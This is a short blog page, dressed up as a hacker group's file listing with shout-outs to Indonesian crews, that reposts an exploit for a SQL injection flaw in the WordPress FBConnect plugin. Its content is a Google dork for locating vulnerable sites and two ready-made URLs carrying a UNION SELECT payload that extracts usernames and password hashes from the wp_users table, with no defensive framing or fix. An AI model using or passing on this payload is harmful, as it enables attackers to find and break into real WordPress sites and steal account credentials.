CMD666
JatimCrew
today : | at : | safemode : ON
> Thanks To | G3MB3LZ | Karna Radhey | 3vil666 | ZuanBinjai | Chliz Aceh | Jundab | Pretty | Bhandell | Jufry-Gaptek | ArrayXc | 4j4l13 | Ares | Freesider | Xcrew | IndoBackTrack | IndoBlackHat | JatimCrew | KidzCyber Team's | And You
name author perms com modified label

Wordpress plugin FBConnect SQL Injection Vulnerability Mysterykid rwxr-xr-x 0 04.38

Filename Wordpress plugin FBConnect SQL Injection Vulnerability
Permission rw-r--r--
Author Mysterykid
Date and Time 04.38
Label
Action 
# Exploit Title: Wordpress plugin FBConnect SQL-Inj
# Google Dork: inurl:"fbconnect_action=myhome"
# Date: 03.04.2011
# Author: cyber-punk
# Software Link: http://wordpress.org/
# Version: all, if plugin is on
# GreetZ: 1337day.com Exploit DataBase

http://wordpress-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

or

http://wp-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 

Jayalah Indonesiaku © 2013 CMD-666
un-Name Template design by CMD-666